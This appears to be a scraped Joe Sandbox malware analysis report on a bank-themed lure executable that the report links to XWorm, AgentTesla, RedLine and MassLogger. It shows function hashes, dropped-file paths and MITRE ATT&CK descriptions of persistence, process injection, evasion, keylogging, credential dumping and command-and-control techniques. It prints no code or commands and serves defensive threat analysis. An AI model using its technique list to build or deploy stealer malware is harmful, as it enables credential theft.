Instruction ID: 59c4a88c595f83e7da6b375aa4ee9e17b34550e07e9aa69bb43d514dfe509448
Opcode Fuzzy Hash: 0e249edce8be83883cd6cafbd8eb328de067350a9c48c3088945ec3e6da796a8
Instruction Fuzzy Hash: 1D714731E0E94A5FE785F77C98562F97BE2EF85290F0801BAD14DC3193DE686C428791

Function 00007FF848AF0B01 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5b8a5c30c0d449337698c7b06ee59576f141fcc9d1c7a3828f2eb30e241ce1
Instruction ID: 5255c8c525e245350acebd28f055c3b2c5fff5616ec592741e27d9a66e24549b
Opcode Fuzzy Hash: 2e5b8a5c30c0d449337698c7b06ee59576f141fcc9d1c7a3828f2eb30e241ce1
Instruction Fuzzy Hash: BC31E321F1990A8FE744FBBC580A3BCB6D2EF98795F04417AE10DC3283DE2859018792

Function 00007FF848AF09BD Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce34f05294d096fe291437581e8977788492d2a13e1a320c622ae88e2996ebe5
Instruction ID: 079a2885194120ce3ca6c45279e9da25fcf9eaf3c9442ef85ef8224807fbc6d6
Opcode Fuzzy Hash: ce34f05294d096fe291437581e8977788492d2a13e1a320c622ae88e2996ebe5
Instruction Fuzzy Hash: 4431BF30A19A0A9FEB84FF78C8A56EDBBB1FF98304F540575D109C3287CE38A9408B50

Function 00007FF848AF180C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e0f2211c23f83531296871c2ba881de95bc022afd5ffbacc4325a5a3c01c3e
Instruction ID: 40fbf842a54eb6c128fc2986d98bda134c168fa7a684b0021e8fa7879da8d90c
Opcode Fuzzy Hash: e0e0f2211c23f83531296871c2ba881de95bc022afd5ffbacc4325a5a3c01c3e
Instruction Fuzzy Hash: A7219E30B1DA494FE788EB2C945A378B2C2EF98745F0445BEE00EC3297DE689C41C785

Function 00007FF848AF1901 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a148e6cc52e307e6973175b5342b82833d076e5c5cc7b85d5e92db8e462f8b4f
Instruction ID: 612642f84dfb9820deb38aea98147b6709f4127260b62461a995deeb31836ab3
Opcode Fuzzy Hash: a148e6cc52e307e6973175b5342b82833d076e5c5cc7b85d5e92db8e462f8b4f
Instruction Fuzzy Hash: 2501261190DBC10FE746BB3C58991757FE1DF822A8F0806BBE498C71D7DA149A858793

Analysis Process: apihost.exePID: 7820, Parent PID: 2604COMMON

Execution Graph

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848AE2C28 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF848AE2CF1

Memory Dump Source

Source File: 0000001B.00000002.4630706989.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848ae0000_apihost.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 215b5b5059e6bed12d91f1f0dd81743aed18248da5ec33ec22073a34dad31b28
Instruction ID: 3b1132520dfc195203630c97917e0f439d5e932250f44aa326f6c9cfd3a65fff
Opcode Fuzzy Hash: 215b5b5059e6bed12d91f1f0dd81743aed18248da5ec33ec22073a34dad31b28
Instruction Fuzzy Hash: 5441F63090DA4C5FDB58EB68D8466FDBBE1EB99365F00027EE049C3292CB64A812C7D5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Agenttesla

Threatname: RedLine

Threatname: MassLogger

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YkxAHNcqEmoeLS.e_9eeb4b354541f12768ae3acca2321103de9a447_c301604a_e73110a1-db0f-4795-a1cb-34777456ce2d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER68E7.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D5C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DBB.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre